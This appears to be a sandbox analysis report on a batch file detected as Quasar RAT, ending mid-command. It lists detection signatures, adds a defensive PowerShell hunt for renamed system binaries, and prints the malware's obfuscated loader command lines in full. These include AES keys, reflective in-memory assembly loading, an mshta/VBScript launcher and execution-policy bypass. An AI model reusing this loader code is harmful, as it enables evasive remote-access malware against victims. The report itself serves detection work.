Windows Analysis Report
WinScanGuard_v.2.1.bat

Overview

General Information

Sample Name:WinScanGuard_v.2.1.bat
Analysis ID:1352643
MD5:1837a5f032a42228c0854fb83a8d12c8
SHA1:de434e8479dfbc102ac30428b69199009973d788
SHA256:13291c07421049ba4d39f521c3ae17923180ac5186d87952709c1fa775e39dd4
Tags:bat

Detection

Quasar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Quasar RAT
Detected unpacking (creates a PE file in dynamic memory)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Yara detected Costura Assembly Loader
Renames powershell.exe to bypass HIPS
Powershell is started from unusual location (likely to bypass HIPS)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Deletes itself after installation
Found large BAT file
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Drops executables to the windows directory (C:\Windows) and starts them
Powershell connects to network
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Writes to foreign memory regions
Bypasses PowerShell execution policy
Very long command line found
Suspicious powershell command line found
Obfuscated command line found
Modifies the context of a thread in another process (thread injection)
One or more processes crash
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates COM task schedule object (often to register a task for autostart)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Allocates memory with a write watch (potentially for evading sandboxes)
Detected TCP or UDP traffic on non-standard ports
Found evasive API chain (may stop execution after accessing registry keys)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
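Two of the signatures above ("Renames powershell.exe to bypass HIPS" and "Sample file is different than original file name gathered from version info") describe the same trick that the process tree makes visible: cmd.exe, mshta.exe and powershell.exe are copied into C:\Windows under a `$sxr-` prefix and run from there, so any control keyed on the process name never fires. The MD5 of `$sxr-cmd.exe` equals that of the original cmd.exe and the MD5 of `$sxr-powershell.exe` equals that of `WinScanGuard_v.2.1.bat.exe`, so these are byte-identical copies, not patched binaries. The check below is an added example for hunting that pattern on a live host; it is not part of the Joe Sandbox report. It compares the on-disk name of every executable in C:\Windows, and of every running process, with the OriginalFilename stored in the file's version resource, which a plain copy does not change. The `$sxr-` column is specific to this sample and is only extra context; the name mismatch is the generic test. Expect a handful of benign mismatches from installers and updaters, so review the output rather than alerting on it blindly.

```powershell
# Added example: hunt for renamed Microsoft binaries dropped into C:\Windows.
# A copied binary keeps the OriginalFilename of its version resource
# (powershell.exe carries 'PowerShell.EXE', cmd.exe 'Cmd.Exe', ...), so comparing
# it with the on-disk name exposes the rename. -ne is case-insensitive in PowerShell.
function Get-RenamedWindowsBinary {
    param([string]$Root = 'C:\Windows')   # the report's copies sit directly in C:\Windows, not in a subfolder
    Get-ChildItem -LiteralPath $Root -File -Filter '*.exe' -ErrorAction SilentlyContinue |
        ForEach-Object {
            $orig = $_.VersionInfo.OriginalFilename
            if ($orig -and ($orig.Trim() -ne $_.Name)) {
                [pscustomobject]@{
                    Path              = $_.FullName
                    OriginalFilename  = $orig
                    Company           = $_.VersionInfo.CompanyName
                    SHA256            = (Get-FileHash -Algorithm SHA256 -LiteralPath $_.FullName).Hash
                    SampleStylePrefix = $_.Name.StartsWith('$sxr-')   # prefix seen in this report only
                }
            }
        }
}

# The same test against the live process list. This also catches a renamed copy that
# has already been removed from disk ("Deletes itself after installation") but is still
# running, and it shows the command line, which for this sample is the decryptor stub.
function Get-RenamedRunningProcess {
    Get-Process -ErrorAction SilentlyContinue | ForEach-Object {
        try {
            $path = $_.MainModule.FileName
            $orig = $_.MainModule.FileVersionInfo.OriginalFilename
        } catch { return }   # access denied on protected or other-session processes
        if ($path -and $orig -and ($orig.Trim() -ne (Split-Path -Leaf $path))) {
            [pscustomobject]@{
                PID              = $_.Id
                Path             = $path
                OriginalFilename = $orig
                CommandLine      = (Get-CimInstance Win32_Process -Filter "ProcessId = $($_.Id)").CommandLine
            }
        }
    }
}

Get-RenamedWindowsBinary   | Format-Table -AutoSize
Get-RenamedRunningProcess  | Format-Table -AutoSize
```

Run it from an elevated prompt so that MainModule is readable for processes in other sessions; without elevation the on-disk check still works, the process check only covers your own session.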

Classification

  • System is w10x64
  • cmd.exe (PID: 6772 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\WinScanGuard_v.2.1.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WinScanGuard_v.2.1.bat.exe (PID: 7128 cmdline: "WinScanGuard_v.2.1.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function oLSgt($QHQwZ){ $FhDgh=[System.Security.Cryptography.Aes]::Create(); $FhDgh.Mode=[System.Security.Cryptography.CipherMode]::CBC; $FhDgh.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $FhDgh.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ONJSi5FjJzv4AOEMBvugvr4ituUVmgVNRnjeJyrP0WQ='); $FhDgh.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CLQNYwl0vsdfD4X+5YKrxQ=='); $SpFlB=$FhDgh.CreateDecryptor(); $return_var=$SpFlB.TransformFinalBlock($QHQwZ, 0, $QHQwZ.Length); $SpFlB.Dispose(); $FhDgh.Dispose(); $return_var;}function rnHmS($QHQwZ){ $WxVgK=New-Object System.IO.MemoryStream(,$QHQwZ); $bpCBe=New-Object System.IO.MemoryStream; $coUVU=New-Object System.IO.Compression.GZipStream($WxVgK, [IO.Compression.CompressionMode]::Decompress); $coUVU.CopyTo($bpCBe); $coUVU.Dispose(); $WxVgK.Dispose(); $bpCBe.Dispose(); $bpCBe.ToArray();}function ZAtIe($QHQwZ,$cjUqy){ $oSPmD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$QHQwZ); $xWTDt=$oSPmD.EntryPoint; $xWTDt.Invoke($null, $cjUqy);}$YlWDR=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\Desktop\WinScanGuard_v.2.1.bat').Split([Environment]::NewLine);foreach ($XUIQg in $YlWDR) { if ($XUIQg.StartsWith('SEROXEN')) { $sOgSv=$XUIQg.Substring(7); break; }}$ZErMU=[string[]]$sOgSv.Split('\');$tzgBc=rnHmS (oLSgt ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZErMU[0])));$TtDxt=rnHmS (oLSgt ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZErMU[1])));ZAtIe $TtDxt (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));ZAtIe $tzgBc (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN')); MD5: 04029E121A0CFA5991749937DD22A1D9)
      • dllhost.exe (PID: 4916 cmdline: C:\Windows\System32\dllhost.exe /Processid:{17980c38-011a-4e2a-a8da-a3b9e80db269} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • dllhost.exe (PID: 7132 cmdline: C:\Windows\SysWOW64\dllhost.exe /Processid:{6ee5d1df-df32-414a-8053-43a03a04def5} MD5: 6F3C9485F8F97AC04C8E43EF4463A68C)
        • WerFault.exe (PID: 1440 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7132 -s 144 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • dllhost.exe (PID: 1228 cmdline: C:\Windows\System32\dllhost.exe /Processid:{b60ad232-6d40-4822-9220-52a4d3050cb3} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • dllhost.exe (PID: 5252 cmdline: C:\Windows\SysWOW64\dllhost.exe /Processid:{603825cb-58d6-4ab4-99a0-2fdb5cd309d6} MD5: 6F3C9485F8F97AC04C8E43EF4463A68C)
  • $sxr-mshta.exe (PID: 344 cmdline: C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-bWTLJBKbogHiYUerhoAr4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • $sxr-cmd.exe (PID: 5820 cmdline: "C:\Windows\$sxr-cmd.exe" /c %$sxr-bWTLJBKbogHiYUerhoAr4312:&#<?=% MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • $sxr-powershell.exe (PID: 5088 cmdline: C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function ZXowG($YGfCS){ $HJBVM=[System.Security.Cryptography.Aes]::Create(); $HJBVM.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HJBVM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HJBVM.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc='); $HJBVM.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w=='); $SHNYR=$HJBVM.('rotpyrceDetaerC'[-1..-15] -join '')(); $ptoRz=$SHNYR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YGfCS, 0, $YGfCS.Length); $SHNYR.Dispose(); $HJBVM.Dispose(); $ptoRz;}function MiajR($YGfCS){ $VHZiJ=New-Object System.IO.MemoryStream(,$YGfCS); $MKYCr=New-Object System.IO.MemoryStream; $pphYy=New-Object System.IO.Compression.GZipStream($VHZiJ, [IO.Compression.CompressionMode]::Decompress); $pphYy.CopyTo($MKYCr); $pphYy.Dispose(); $VHZiJ.Dispose(); $MKYCr.Dispose(); $MKYCr.ToArray();}function DEttm($YGfCS,$ZtwIE){ $mZolj=[System.Reflection.Assembly]::Load([byte[]]$YGfCS); $lOFyP=$mZolj.EntryPoint; $lOFyP.Invoke($null, $ZtwIE);}$HJBVM1 = New-Object System.Security.Cryptography.AesManaged;$HJBVM1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$HJBVM1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$HJBVM1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc=');$HJBVM1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w==');$GhtEl = $HJBVM1.('rotpyrceDetaerC'[-1..-15] -join '')();$tSRUF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/drqfgtKhdXyibTYP3tLyQ==');$tSRUF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF, 0, $tSRUF.Length);$tSRUF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF);$tbgVF = 
[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uYhEUY/+HnwQeclFyB1FDUqtQym+nHVdwwfjEKKh6LU=');$tbgVF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tbgVF, 0, $tbgVF.Length);$tbgVF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tbgVF);$mjWsq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v2S4NwnXvXtvXwhesSwNIQ==');$mjWsq = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mjWsq, 0, $mjWsq.Length);$mjWsq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mjWsq);$iBFKh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RZnS/OPKxZu99whpuaUC1mhVovuCskWdCRfz1FlzhkQ9viPcHXWbSXtn8ebOdAixZCvIKg7kNsNJQfjixS10DgPnP1RgMFsS0Ufgfy1HhpeBrScxYLrFwuGlVdIKxKsNCNlET01ZQTP7t1afzsZuiFRyhdaoNNd/a48fSObOV6s0Dg4uz6IT5eoHk560k0oKDQhofXeJn4REmUW/Qa+OFgHhvk0nKSZmZIWIfiCOl824A/iJhUAIvvnXISy3KfqXbk9SxrWiI48yb3R5eHDU2SFOOdwj4/P9sUdFWqjTGEiXdZH4kVSXjz0XVe4ZYpD+he6+N8ebMZVScb8HKUN/+DzmXUfDtfwWV5MarCY6ZdmO2yJ4s2sbOzZsPvxKUwPa7yfFsYHuzQ4rPk9Yysf5MqWX04//4DGnhGl+/sl+WZ0=');$iBFKh = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBFKh, 0, $iBFKh.Length);$iBFKh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($iBFKh);$sRLEH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NPfQRzZslsp7LUVLS08LhQ==');$sRLEH = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sRLEH, 0, $sRLEH.Length);$sRLEH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sRLEH);$sLsEZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bw6rZXASWFOFrL4CLrePaw==');$sLsEZ = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sLsEZ, 0, $sLsEZ.Length);$sLsEZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sLsEZ);$SPFoS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QYOQkrgRiSqCZw4PoX3ndQ==');$SPFoS = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SPFoS, 0, $SPFoS.Length);$SPFoS = 
[System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SPFoS);$xCumf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SdFQ7WIJndJ4NA0XksAXZg==');$xCumf = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xCumf, 0, $xCumf.Length);$xCumf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xCumf);$WAkXF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('AR4GvTa2A8uikK6+T2nKoQ==');$WAkXF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WAkXF, 0, $WAkXF.Length);$WAkXF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WAkXF);$tSRUF0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('L3o7gT8T96iY71qHMveksg==');$tSRUF0 = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF0, 0, $tSRUF0.Length);$tSRUF0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF0);$tSRUF1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('E8Y/0E3VS02vVNfuFqTGCw==');$tSRUF1 = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF1, 0, $tSRUF1.Length);$tSRUF1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF1);$tSRUF2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3ob3sb5+Bgi0uwQxb9HNKg==');$tSRUF2 = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF2, 0, $tSRUF2.Length);$tSRUF2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF2);$tSRUF3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('E46YnTPfmALJD+Ie1fVvGQ==');$tSRUF3 = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF3, 0, $tSRUF3.Length);$tSRUF3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF3);$GhtEl.Dispose();$HJBVM1.Dispose();if (@(get-process -ea silentlycontinue $tSRUF3).count -gt 1) {exit};$BcpNi = 
[Microsoft.Win32.Registry]::$xCumf.$SPFoS($tSRUF).$sLsEZ($tbgVF);$QCqEG=[string[]]$BcpNi.Split('\');$BPwjg=MiajR(ZXowG([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QCqEG[1])));DEttm $BPwjg (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$RLOOe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QCqEG[0]);$HJBVM = New-Object System.Security.Cryptography.AesManaged;$HJBVM.Mode = [System.Security.Cryptography.CipherMode]::CBC;$HJBVM.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$HJBVM.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc=');$HJBVM.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w==');$SHNYR = $HJBVM.('rotpyrceDetaerC'[-1..-15] -join '')();$RLOOe = $SHNYR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RLOOe, 0, $RLOOe.Length);$SHNYR.Dispose();$HJBVM.Dispose();$VHZiJ = New-Object System.IO.MemoryStream(, $RLOOe);$MKYCr = New-Object System.IO.MemoryStream;$pphYy = New-Object System.IO.Compression.GZipStream($VHZiJ, [IO.Compression.CompressionMode]::$tSRUF1);$pphYy.$WAkXF($MKYCr);$pphYy.Dispose();$VHZiJ.Dispose();$MKYCr.Dispose();$RLOOe = $MKYCr.ToArray();$jMAvT = $iBFKh | IEX;$mZolj = $jMAvT::$tSRUF2($RLOOe);$lOFyP = $mZolj.EntryPoint;$lOFyP.$tSRUF0($null, (, [string[]] ($mjWsq))) MD5: 04029E121A0CFA5991749937DD22A1D9)
        • dllhost.exe (PID: 1908 cmdline: C:\Windows\System32\dllhost.exe /Processid:{d814285b-904f-4c3a-8cab-4579f96b72d9} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
        • dllhost.exe (PID: 1196 cmdline: C:\Windows\SysWOW64\dllhost.exe /Processid:{f835588e-a1ef-4d6b-bc1e-b44ddb22d787} MD5: 6F3C9485F8F97AC04C8E43EF4463A68C)
        • $sxr-powershell.exe (PID: 7056 cmdline: "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5088).WaitForExit();[System.Threading.Thread]::Sleep(5000); function ZXowG($YGfCS){ $HJBVM=[System.Security.Cryptography.Aes]::Create(); $HJBVM.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HJBVM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HJBVM.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc='); $HJBVM.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w=='); $SHNYR=$HJBVM.('rotpyrceDetaerC'[-1..-15] -join '')(); $ptoRz=$SHNYR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YGfCS, 0, $YGfCS.Length); $SHNYR.Dispose(); $HJBVM.Dispose(); $ptoRz;}function MiajR($YGfCS){ $VHZiJ=New-Object System.IO.MemoryStream(,$YGfCS); $MKYCr=New-Object System.IO.MemoryStream; $pphYy=New-Object System.IO.Compression.GZipStream($VHZiJ, [IO.Compression.CompressionMode]::Decompress); $pphYy.CopyTo($MKYCr); $pphYy.Dispose(); $VHZiJ.Dispose(); $MKYCr.Dispose(); $MKYCr.ToArray();}function DEttm($YGfCS,$ZtwIE){ $mZolj=[System.Reflection.Assembly]::Load([byte[]]$YGfCS); $lOFyP=$mZolj.EntryPoint; $lOFyP.Invoke($null, $ZtwIE);}$HJBVM1 = New-Object System.Security.Cryptography.AesManaged;$HJBVM1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$HJBVM1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$HJBVM1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc=');$HJBVM1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w==');$GhtEl = $HJBVM1.('rotpyrceDetaerC'[-1..-15] -join '')();$tSRUF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/drqfgtKhdXyibTYP3tLyQ==');$tSRUF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF, 0, $tSRUF.Length);$tSRUF = 
[System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF);$tbgVF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uYhEUY/+HnwQeclFyB1FDUqtQym+nHVdwwfjEKKh6LU=');$tbgVF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tbgVF, 0, $tbgVF.Length);$tbgVF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tbgVF);$mjWsq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v2S4NwnXvXtvXwhesSwNIQ==');$mjWsq = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mjWsq, 0, $mjWsq.Length);$mjWsq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mjWsq);$iBFKh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RZnS/OPKxZu99whpuaUC1mhVovuCskWdCRfz1FlzhkQ9viPcHXWbSXtn8ebOdAixZCvIKg7kNsNJQfjixS10DgPnP1RgMFsS0Ufgfy1HhpeBrScxYLrFwuGlVdIKxKsNCNlET01ZQTP7t1afzsZuiFRyhdaoNNd/a48fSObOV6s0Dg4uz6IT5eoHk560k0oKDQhofXeJn4REmUW/Qa+OFgHhvk0nKSZmZIWIfiCOl824A/iJhUAIvvnXISy3KfqXbk9SxrWiI48yb3R5eHDU2SFOOdwj4/P9sUdFWqjTGEiXdZH4kVSXjz0XVe4ZYpD+he6+N8ebMZVScb8HKUN/+DzmXUfDtfwWV5MarCY6ZdmO2yJ4s2sbOzZsPvxKUwPa7yfFsYHuzQ4rPk9Yysf5MqWX04//4DGnhGl+/sl+WZ0=');$iBFKh = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBFKh, 0, $iBFKh.Length);$iBFKh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($iBFKh);$sRLEH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NPfQRzZslsp7LUVLS08LhQ==');$sRLEH = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sRLEH, 0, $sRLEH.Length);$sRLEH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sRLEH);$sLsEZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bw6rZXASWFOFrL4CLrePaw==');$sLsEZ = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sLsEZ, 0, $sLsEZ.Length);$sLsEZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sLsEZ);$SPFoS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QYOQkrgRiSqCZw4PoX3ndQ==');$SPFoS = 
$GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SPFoS, 0, $SPFoS.Length);$SPFoS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SPFoS);$xCumf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SdFQ7WIJndJ4NA0XksAXZg==');$xCumf = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xCumf, 0, $xCumf.Length);$xCumf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xCumf);$WAkXF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('AR4GvTa2A8uikK6+T2nKoQ==');$WAkXF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WAkXF, 0, $WAkXF.Length);$WAkXF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WAkXF);$tSRUF0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('L3o7gT8T96iY71qHMveksg==');$tSRUF0 = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF0, 0, $tSRUF0.Length);$tSRUF0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF0);$tSRUF1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('E8Y/0E3VS02vVNfuFqTGCw==');$tSRUF1 = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF1, 0, $tSRUF1.Length);$tSRUF1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF1);$tSRUF2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3ob3sb5+Bgi0uwQxb9HNKg==');$tSRUF2 = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF2, 0, $tSRUF2.Length);$tSRUF2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF2);$tSRUF3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('E46YnTPfmALJD+Ie1fVvGQ==');$tSRUF3 = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF3, 0, $tSRUF3.Length);$tSRUF3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF3);$GhtEl.Dispose();$HJBVM1.Dispose();if (@(get-process -ea silentlycontinue $tSRUF3).count -gt 1) {exit};$BcpNi = 
